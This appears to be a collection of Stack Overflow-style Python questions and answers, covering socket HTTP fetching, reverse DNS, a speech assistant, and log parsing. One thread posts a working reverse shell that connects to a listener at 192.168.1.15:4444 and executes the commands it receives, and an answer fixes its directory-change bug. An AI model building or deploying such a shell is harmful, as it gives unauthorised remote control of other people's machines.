I am doing this ungraded assignment from an online course (so please do not hesitate to post solutions to this nemesis of mine).
The assignment: open a file from a web page using the socket module, prompt the user for the URL, print the first 3000 characters including the headers, but count all of the characters in the file.
First I did this:
import socket
import re
url = raw_input('Enter - ')
try:
    hostname = re.findall('http://(.+?)/', url)
    hostname = hostname[0]
    mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    mysock.connect((hostname, 80))
    mysock.send('GET ' + url + ' HTTP/1.0\n\n')
    count = 0
    text = str()
    while True:
        data = mysock.recv(512)
        if ( len(data) < 1 ) :
            break
        count += len(data)
        if count <= 3000:
            print data
    mysock.close()
except:
    print 'Please enter a valid URL'
print count
But every time I adjust the buffer size in mysock.recv(), the output changes and I get random spaces inside the text.
Then I tried this, which eliminated the odd random line splits, but the output still differs depending on the buffer size.
import socket
import re
url = raw_input('Enter - ')
try:
    hostname = re.findall('http://(.+?)/', url)
    hostname = hostname[0]
    mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    mysock.connect((hostname, 80))
    mysock.send('GET ' + url + ' HTTP/1.0\n\n')
    count = 0
    text = str()
    while True:
        data = mysock.recv(512)
        if ( len(data) < 1 ) :
            break
        count += len(data)
        if count <= 3000:
            data.rstrip()
            text = text + data
    mysock.close()
except:
    print 'Please enter a valid URL'
print text
print count
So I've been at it for several hours now and still can't get the exact same output regardless of the size of the buffer without funky line splitting spaces in there.
The file that I use: http://www.py4inf.com/code/romeo-full.txt
I'm working through the same book and am on the same exercise. The question is three years old, but this may still be helpful to someone.
First, you can't print the data that way, because print adds a newline after every chunk. You need something like this:
while True:
    data = mysock.recv(512)
    if len(data) < 1:
        break
    print(data.decode(),end='')
Also, it's perfectly normal that the results differ when you change the buffer size from 512: the count <= 3000 test is applied once per chunk, so the point where printing stops depends on the chunk size. In any case, the author only asked to stop after showing 3000 characters.
My full code (it works only with HTTP; HTTPS is not handled):
import socket
import sys
import validators
import urllib.parse
url = input('Insert url to fetch: ')
# Test valid url
try:
    valid = validators.url(url)
    if valid != True:
        raise ValueError
except ValueError:
    print('url incorrect')
    sys.exit()
# Test socket connection
try:
    mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print('\nSocket successfully created')
except socket.error as err:
    print('Socket creation failed with error %s' %(err))
# Extract hostname of url
parsed_url = urllib.parse.urlparse(url)
print('Resolving ->', parsed_url.netloc)
# Test if we can resolve the host
try:
    host_ip = socket.gethostbyname(parsed_url.netloc)
except socket.gaierror:
    print('Unable to resolve', parsed_url.netloc)
    sys.exit()
# Connect to host
mysock.connect((parsed_url.netloc, 80))
# Crafting our command to send
cmd = ('GET ' + url + ' HTTP/1.0\r\n\r\n').encode()
# Sending our command
mysock.send(cmd)
count = 0
# Receive data
while True:
    data = mysock.recv(500)
    count += len(data)
    if len(data) < 1:
        break
    if count > 3000:
        break
    print(data.decode(),end='')
mysock.close()
Could be the solution, maybe
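The dependence on the buffer size comes from cutting off on whole chunks. Here is a minimal sketch of one way around it, assuming the response is available as an iterable of byte chunks (as successive recv() calls would produce). The helper names head_and_total and split_into_chunks are hypothetical and not part of the answer above; the sketch counts bytes, which equals characters only for single-byte text.

```python
def head_and_total(chunks, limit=3000):
    """Return (first `limit` bytes, total byte count) for an iterable of chunks."""
    head = bytearray()
    total = 0
    for chunk in chunks:
        total += len(chunk)
        room = limit - len(head)
        if room > 0:
            # Take only as much of this chunk as still fits under the limit.
            head.extend(chunk[:room])
    return bytes(head), total


def split_into_chunks(payload, size):
    """Simulate recv(size) by slicing a bytes object into pieces."""
    return [payload[i:i + size] for i in range(0, len(payload), size)]


if __name__ == "__main__":
    payload = b"x" * 8000  # stand-in for an HTTP response
    for size in (100, 512, 4096):
        head, total = head_and_total(split_into_chunks(payload, size))
        print(size, len(head), total)
```

With a real socket, the chunks could come from iter(lambda: mysock.recv(512), b""), and the head would be decoded once at the end rather than chunk by chunk.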
I am currently working on a reverse DNS script intended to open a log file, find the IP address, then resolve the IP to DNS. I have a regex set up to identify the IP address in the file, but when I added socket.gethostbyaddr to my script the script ignores my regex and still lists objects in the file that are not IP addresses. I've never used Python before, but this is what I have right now:
import socket
import re
f = open('ipidk.txt' , 'r')
lines = f.readlines()
raw_data = str(f.readlines())
regex = r'(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})'
foundip = re.findall( regex, raw_data )
for raw_data in lines:
    host = raw_data.strip()
    try:
        dns = socket.gethostbyaddr(host)
        print("%s - %s" % (host, dns))
    except socket.error as exc:
        pass
f.close()
You're calling f.readlines() twice. The first time reads everything in the file, and puts that in lines. The second time has nothing left to read (it starts reading from the current file position, it doesn't rewind to the beginning), so it returns an empty list, and raw_data will just be "[]", with no IPs.
Just call f.read() once, and assign that to raw_data.
Then you need to loop over the IPs found with the regexp, not lines.
import socket
import re
with open('ipidk.txt' , 'r') as f:
    raw_data = f.read()
regex = r'(?:\d{1,3}\.){3}\d{1,3}'
foundip = re.findall( regex, raw_data )
for host in foundip:
    try:
        dns = socket.gethostbyaddr(host)
        print("%s - %s" % (host, dns))
    except socket.error as exc:
        pass
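To see the file-position behaviour without touching a real log, here is a small sketch that uses io.StringIO as a stand-in file. The sample text and the helper name find_ips are made up for illustration, and the extra check that each octet is at most 255 is an addition, not part of the answer.

```python
import io
import re

IP_PATTERN = re.compile(r'(?:\d{1,3}\.){3}\d{1,3}')


def find_ips(text):
    """Return dotted-quad strings from text whose octets are all in 0..255."""
    candidates = IP_PATTERN.findall(text)
    return [ip for ip in candidates
            if all(int(octet) <= 255 for octet in ip.split('.'))]


if __name__ == "__main__":
    sample = "login from 10.0.0.5\nversion 1.2.3\nfailed 999.1.1.1 then 192.168.1.20\n"
    f = io.StringIO(sample)
    first = f.readlines()   # reads every line and leaves the position at the end
    second = f.readlines()  # nothing left to read, so this is an empty list
    print(len(first), second)
    print(find_ips(sample))
```

Each address returned by find_ips could then be passed to socket.gethostbyaddr inside the same try/except as in the answer.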
I'm aiming to build my own Jarvis, which listens all the time and activates when I say hello. I learned that the Google Cloud Speech-to-Text API doesn't listen for more than 60 seconds, but then I found this not-so-well-known link, where the script listens indefinitely. The author of the GitHub script says he uses a trick: the script refreshes after 60 seconds so that the program doesn't crash.
https://github.com/GoogleCloudPlatform/python-docs-samples/blob/master/speech/cloud-client/transcribe_streaming_indefinite.py
The following is my modified version, since I wanted it to answer my questions only after I say "hello", and not answer me all the time. Now, if I ask my Jarvis a question whose answer takes more than 60 seconds, so that it doesn't get time to refresh, the program crashes :(
#!/usr/bin/env python
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Google Cloud Speech API sample application using the streaming API.
NOTE: This module requires the additional dependency `pyaudio`. To install
using pip:
pip install pyaudio
Example usage:
python transcribe_streaming_indefinite.py
"""
# [START speech_transcribe_infinite_streaming]
from __future__ import division
import time
import re
import sys
import os
from google.cloud import speech
from pygame.mixer import *
from googletrans import Translator
# running=True
translator = Translator()
init()
import pyaudio
from six.moves import queue
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "C:\\Users\\mnauf\\Desktop\\rehandevice\\key.json"
from commands2 import commander
cmd=commander()
# Audio recording parameters
STREAMING_LIMIT = 55000
SAMPLE_RATE = 16000
CHUNK_SIZE = int(SAMPLE_RATE / 10) # 100ms
def get_current_time():
return int(round(time.time() * 1000))
def duration_to_secs(duration):
return duration.seconds + (duration.nanos / float(1e9))
class ResumableMicrophoneStream:
"""Opens a recording stream as a generator yielding the audio chunks."""
def __init__(self, rate, chunk_size):
self._rate = rate
self._chunk_size = chunk_size
self._num_channels = 1
self._max_replay_secs = 5
# Create a thread-safe buffer of audio data
self._buff = queue.Queue()
self.closed = True
self.start_time = get_current_time()
# 2 bytes in 16 bit samples
self._bytes_per_sample = 2 * self._num_channels
self._bytes_per_second = self._rate * self._bytes_per_sample
self._bytes_per_chunk = (self._chunk_size * self._bytes_per_sample)
self._chunks_per_second = (
self._bytes_per_second // self._bytes_per_chunk)
def __enter__(self):
self.closed = False
self._audio_interface = pyaudio.PyAudio()
self._audio_stream = self._audio_interface.open(
format=pyaudio.paInt16,
channels=self._num_channels,
rate=self._rate,
input=True,
frames_per_buffer=self._chunk_size,
# Run the audio stream asynchronously to fill the buffer object.
# This is necessary so that the input device's buffer doesn't
# overflow while the calling thread makes network requests, etc.
stream_callback=self._fill_buffer,
)
return self
def __exit__(self, type, value, traceback):
self._audio_stream.stop_stream()
self._audio_stream.close()
self.closed = True
# Signal the generator to terminate so that the client's
# streaming_recognize method will not block the process termination.
self._buff.put(None)
self._audio_interface.terminate()
def _fill_buffer(self, in_data, *args, **kwargs):
"""Continuously collect data from the audio stream, into the buffer."""
self._buff.put(in_data)
return None, pyaudio.paContinue
def generator(self):
while not self.closed:
if get_current_time() - self.start_time > STREAMING_LIMIT:
self.start_time = get_current_time()
break
# Use a blocking get() to ensure there's at least one chunk of
# data, and stop iteration if the chunk is None, indicating the
# end of the audio stream.
chunk = self._buff.get()
if chunk is None:
return
data = [chunk]
# Now consume whatever other data's still buffered.
while True:
try:
chunk = self._buff.get(block=False)
if chunk is None:
return
data.append(chunk)
except queue.Empty:
break
yield b''.join(data)
def search(responses, stream, code):
responses = (r for r in responses if (
r.results and r.results[0].alternatives))
num_chars_printed = 0
for response in responses:
if not response.results:
continue
# The `results` list is consecutive. For streaming, we only care about
# the first result being considered, since once it's `is_final`, it
# moves on to considering the next utterance.
result = response.results[0]
if not result.alternatives:
continue
# Display the transcription of the top alternative.
top_alternative = result.alternatives[0]
transcript = top_alternative.transcript
# music.load("/home/pi/Desktop/rehandevice/end.mp3")
# music.play()
# Display interim results, but with a carriage return at the end of the
# line, so subsequent lines will overwrite them.
# If the previous result was longer than this one, we need to print
# some extra spaces to overwrite the previous result
overwrite_chars = ' ' * (num_chars_printed - len(transcript))
if not result.is_final:
sys.stdout.write(transcript + overwrite_chars + '\r')
sys.stdout.flush()
num_chars_printed = len(transcript)
else:
#print(transcript + overwrite_chars)
# Exit recognition if any of the transcribed phrases could be
# one of our keywords.
if code=='ur-PK':
transcript=translator.translate(transcript).text
print("Your command: ", transcript + overwrite_chars)
if "hindi assistant" in (transcript+overwrite_chars).lower():
cmd.respond("Alright. Talk to me in urdu",code=code)
main('ur-PK')
elif "english assistant" in (transcript+overwrite_chars).lower():
cmd.respond("Alright. Talk to me in English",code=code)
main('en-US')
cmd.discover(text=transcript + overwrite_chars,code=code)
for i in range(10):
print("Hello world")
break
num_chars_printed = 0
def listen_print_loop(responses, stream, code):
"""Iterates through server responses and prints them.
The responses passed is a generator that will block until a response
is provided by the server.
Each response may contain multiple results, and each result may contain
multiple alternatives; for details, see https://cloud.google.com/speech-to-text/docs/reference/rpc/google.cloud.speech.v1#streamingrecognizeresponse. Here we
print only the transcription for the top alternative of the top result.
In this case, responses are provided for interim results as well. If the
response is an interim one, print a line feed at the end of it, to allow
the next result to overwrite it, until the response is a final one. For the
final one, print a newline to preserve the finalized transcription.
"""
responses = (r for r in responses if (
r.results and r.results[0].alternatives))
music.load(r"C:\\Users\\mnauf\\Desktop\\rehandevice\\coins.mp3")
num_chars_printed = 0
for response in responses:
if not response.results:
continue
# The `results` list is consecutive. For streaming, we only care about
# the first result being considered, since once it's `is_final`, it
# moves on to considering the next utterance.
result = response.results[0]
if not result.alternatives:
continue
# Display the transcription of the top alternative.
top_alternative = result.alternatives[0]
transcript = top_alternative.transcript
# Display interim results, but with a carriage return at the end of the
# line, so subsequent lines will overwrite them.
#
# If the previous result was longer than this one, we need to print
# some extra spaces to overwrite the previous result
overwrite_chars = ' ' * (num_chars_printed - len(transcript))
if not result.is_final:
sys.stdout.write(transcript + overwrite_chars + '\r')
sys.stdout.flush()
num_chars_printed = len(transcript)
else:
print("Listen print loop", transcript + overwrite_chars)
# Exit recognition if any of the transcribed phrases could be
# one of our keywords.
if re.search(r'\b(hello)\b', transcript.lower(), re.I):
#print("Give me order")
music.play()
search(responses, stream,code)
break
elif re.search(r'\b(ہیلو)\b', transcript, re.I):
music.play()
search(responses, stream,code)
break
num_chars_printed = 0
def main(code):
cmd.respond("I am Rayhaan dot A Eye. How can I help you?",code=code)
client = speech.SpeechClient()
config = speech.types.RecognitionConfig(
encoding=speech.enums.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=SAMPLE_RATE,
language_code='en-US',
max_alternatives=1,
enable_word_time_offsets=True)
streaming_config = speech.types.StreamingRecognitionConfig(
config=config,
interim_results=True)
mic_manager = ResumableMicrophoneStream(SAMPLE_RATE, CHUNK_SIZE)
print('Say "Quit" or "Exit" to terminate the program.')
with mic_manager as stream:
while not stream.closed:
audio_generator = stream.generator()
requests = (speech.types.StreamingRecognizeRequest(
audio_content=content)
for content in audio_generator)
responses = client.streaming_recognize(streaming_config,
requests)
# Now, put the transcription responses to use.
try:
listen_print_loop(responses, stream, code)
except:
listen
if __name__ == '__main__':
main('en-US')
# [END speech_transcribe_infinite_streaming]
You can call your functions after recognition in a separate thread. Example:
from threading import Thread
new_thread = Thread(target=music.play)
new_thread.daemon = True # Not always needed; read more about the daemon property
new_thread.start()
Or, if you just want to keep the exception from crashing the program, you can always use try/except. Example:
with mic_manager as stream:
    while not stream.closed:
        try:
            audio_generator = stream.generator()
            requests = (speech.types.StreamingRecognizeRequest(
                audio_content=content)
                for content in audio_generator)
            responses = client.streaming_recognize(streaming_config,
                                                   requests)
            # Now, put the transcription responses to use.
            listen_print_loop(responses, stream, code)
        except BaseException as e:
            print("Exception occurred - {}".format(str(e)))
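The threading suggestion can be sketched without the Speech API. Below, slow_response is a hypothetical stand-in for whatever takes a long time to answer (for example cmd.respond), and handle_command hands it to a daemon thread so the caller gets control back immediately. This is an illustration under those assumptions, not the sample's own code.

```python
import threading
import time


def slow_response(text, results):
    """Hypothetical long-running handler; sleeps to simulate a spoken answer."""
    time.sleep(0.5)
    results.append("answered: " + text)


def handle_command(text, results):
    """Start the handler in a background thread and return the thread at once."""
    worker = threading.Thread(target=slow_response, args=(text, results))
    worker.daemon = True  # do not keep the process alive for this thread
    worker.start()
    return worker


if __name__ == "__main__":
    results = []
    started = time.time()
    worker = handle_command("what time is it", results)
    print("returned after %.3f s" % (time.time() - started))
    worker.join()  # only for the demo, so the result can be printed
    print(results)
```

In the recognition loop the join() would be left out, so the stream can keep refreshing while the answer is still playing.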
I'm making a simple Python 2.7 reverse shell. For the directory-change function, every time I type cd C:\ in my netcat server it throws this error: "WindowsError: [Error 123] The filename, directory name, or volume label syntax is incorrect: 'C:\\n'". Here is my code.
import socket
import os
import subprocess
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "192.168.1.15"
port = 4444
s.connect((host, port))
s.send(os.getcwd() + '> ')
def Shell():
    while True:
        data = s.recv(1024)
        if data[:2] == 'cd':
            os.chdir(data[3:])
        if len(data) > 0:
            proc = subprocess.Popen(data, shell = True ,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
            result = proc.stdout.read() + proc.stderr.read()
            s.send(result)
            s.send(os.getcwd() + '> ')
            print(data)
Shell()
When you use data = s.recv(1024) to receive data from the remote end, the \n character generated when you press Enter to finish the input is received along with it.
So you just need to .strip() it, or use [:-1] to remove the last character (which is \n), when you get the data.
data = s.recv(1024).strip()
or
data = s.recv(1024)[:-1]
Either should work, though .strip() also handles a \r\n line ending.
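A quick way to check the effect of the stray newline, written for Python 3, where recv() returns bytes. The helper name parse_cd is hypothetical; it only separates a cd target from other commands and does not change directory itself.

```python
def parse_cd(data):
    """Return the target directory if data is a 'cd <path>' command, else None."""
    command = data.strip()          # drops a trailing newline or CR+LF alike
    if command[:3] == b'cd ':
        return command[3:].strip().decode()
    return None


if __name__ == "__main__":
    raw = b'cd C:\\\n'              # bytes received after typing the cd command and Enter
    print(repr(raw[3:]))            # the path still carries the newline
    print(repr(parse_cd(raw)))      # newline removed
```

The returned string could then be passed to os.chdir, ideally inside a try/except so a bad path does not end the loop.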
New to Python here.
I am trying to get the most active ip address from a log.txt file and print it in another text file. My first step is to get all the ip addresses. Second to sort the most occurring ip address. But I am stuck in the first step which is:
with open('./log_input/log.txt', 'r+') as f:
    # loops the lines in the text file
    for line in f:
        # split line at whitespace
        cols = line.split()
        # get last column
        byte_size = cols[-1]
        # get the first column [0]
        ip_addresses = cols[0]
        # remove brackets
        byte_size = byte_size.strip('[]')
        # write the byte size in the resource file
        resource_file = open('./log_output/resources.txt', 'a')
        resource_file.write(byte_size + '\n')
        resource_file.truncate()
        # write the ip addresses in the host file
        host_file = open('./log_output/hosts.txt', 'a')
        host_file.seek(0)
        host_file.write(ip_addresses + '\n')
        host_file.truncate()
    resource_file.close()
    host_file.close()
The problem is that the new hosts.txt file keeps the old IP addresses and appends to them instead of being overwritten. I tried this too:
resource_file = open('./log_output/resources.txt', 'w')
host_file = open('./log_output/hosts.txt', 'w')
I also tried 'w+' and other modes, but 'w' or 'w+' leaves only one IP address in the hosts file.
Can someone guide me through this?
Sample Input File
www-c2.proxy.aol.com - - [01/Jul/1995:00:03:52 -0400] "GET /history/skylab/skylab-1.html HTTP/1.0" 200 1659
isdn6-34.dnai.com - - [01/Jul/1995:00:03:52 -0400] "GET /images/kscmap-tiny.gif HTTP/1.0" 200 2537
isdn6-34.dnai.com - - [01/Jul/1995:00:03:52 -0400] "GET /images/ksclogosmall.gif HTTP/1.0" 200 3635
ix-ftw-tx1-24.ix.netcom.com - - [01/Jul/1995:00:03:52 -0400] "GET /shuttle/countdown/count.gif HTTP/1.0" 200 40310
collections.Counter is a handy tool for counting things. Feed it a bunch of text strings and it will create a dict mapping each string to the number of times it was seen. Now counting IP addresses is easy:
>>> import collections
>>> with open('log.txt') as fp:
... counter = collections.Counter(line.split(' ', 1)[0].lower() for line in fp)
...
>>> counter
Counter({'isdn6-34.dnai.com': 2, 'ix-ftw-tx1-24.ix.netcom.com': 1, 'www-c2.proxy.aol.com': 1})
>>> counter.most_common(1)
[('isdn6-34.dnai.com', 2)]
>>>
>>>
>>> with open('most_common.txt', 'w') as fp:
... fp.write(counter.most_common(1)[0][0])
...
17
>>> open('most_common.txt').read()
'isdn6-34.dnai.com'
Thanks for all the help and suggestion.. this fixed my problem.
with open('./log_input/log.txt', 'r+') as f:
    # loops the lines in the text file
    new_ip_addresses = ""
    new_byte_sizes = ""
    new_time_stamp = ""
    resource_file = open('./log_output/resources.txt', 'w')
    host_file = open('./log_output/hosts.txt', 'w')
    hours_file = open('./log_output/hours.txt', 'w')
    for line in f:
        # print re.findall("\[(.*?)\]", line) # ['Hi all', 'this is', 'an example']
        # split line at whitespace
        cols = line.split(' ')
        #get the time stamp times
        # print(cols[4])
        # get byte sizes from the
        byte_size = cols[-1]
        new_byte_sizes += byte_size
        # get ip/host
        ip_addresses = cols[0]
        new_ip_addresses += ip_addresses + '\n'
        # remove brackets
        byte_size = byte_size.strip('[]')
    # write the byte size in the resource file
    print(new_byte_sizes)
    resource_file.write(new_byte_sizes)
    resource_file.close()
    # write the ip addresses in the host file
    print(new_ip_addresses)
    host_file.write(new_ip_addresses)
    host_file.close()
    # nothing is written to the hours file yet; close it so the handle is released
    hours_file.close()
Basically assigning the value to the variable inside the for loop and adding new line solved it for me.
new_ip_addresses += ip_addresses + '\n'
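The same idea, collecting values during the loop and writing once afterwards, can be sketched with lists and str.join. The function name split_log is made up for this example, and it assumes every line has the host in the first column and the byte size in the last, as in the sample input.

```python
def split_log(lines):
    """Return (hosts, byte_sizes) collected from whitespace-separated log lines."""
    hosts, sizes = [], []
    for line in lines:
        cols = line.split()
        if not cols:
            continue  # skip blank lines
        hosts.append(cols[0])
        sizes.append(cols[-1])
    return hosts, sizes


if __name__ == "__main__":
    sample = [
        'www-c2.proxy.aol.com - - [01/Jul/1995:00:03:52 -0400] "GET /history/skylab/skylab-1.html HTTP/1.0" 200 1659\n',
        'isdn6-34.dnai.com - - [01/Jul/1995:00:03:52 -0400] "GET /images/kscmap-tiny.gif HTTP/1.0" 200 2537\n',
    ]
    hosts, sizes = split_log(sample)
    # One write per output, so opening with mode 'w' no longer discards earlier lines.
    print('\n'.join(hosts))
    print('\n'.join(sizes))
```

With real files, each list would be written once inside a with open(path, 'w') block, which also closes the file automatically.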
I am doing an exercise for an online course and keep getting an error. There's also a 404 error in the output. I believe there are really only two spots where this could go wrong, lines 11 and 13, but they look correct to me. If I replace the variables with fixed addresses (not user-supplied), it works fine. Thanks for your help.
import socket
site= raw_input("Enter url:")
print ""
print "site is",site
print ""
hostel = site.split("/")
print "Hostel is", hostel
print ""
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mysock.connect((hostel[2], 80))
mysock.send('GET site HTTP/1.0\n\n')
while True:
    data = mysock.recv(1024)
    data = data.strip()
    if len(data) < 1:
        break
    print data
mysock.close()
You're not using your site variable here, but literally requesting "site":
mysock.send('GET site HTTP/1.0\n\n')
Try:
mysock.send('GET ' + site + ' HTTP/1.0\n\n')
You should use the variable site instead of the literal word site. Try:
message_send = "GET {} HTTP/1.0\r\nHost: {}\r\n\r\n".format(site, hostel[2])
mysock.send(message_send)
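Putting both answers together, one way to build the request from the user's input is sketched below. It uses urllib.parse.urlsplit from the Python 3 standard library; the helper name build_request is hypothetical, and the choice of HTTP/1.0 with a Host header is an assumption that matches the exercise rather than a requirement.

```python
from urllib.parse import urlsplit


def build_request(url):
    """Return (hostname, request_bytes) for a plain-HTTP GET of url."""
    parts = urlsplit(url)
    if parts.scheme != 'http' or not parts.hostname:
        raise ValueError('expected an http:// URL, got %r' % url)
    path = parts.path or '/'
    if parts.query:
        path += '?' + parts.query
    request = 'GET {} HTTP/1.0\r\nHost: {}\r\n\r\n'.format(path, parts.hostname)
    return parts.hostname, request.encode('ascii')


if __name__ == "__main__":
    host, request = build_request('http://www.py4inf.com/code/romeo-full.txt')
    print(host)
    print(request)
```

The hostname goes to mysock.connect((host, 80)) and the bytes go to mysock.sendall(request), so the variable is never replaced by a literal string by accident.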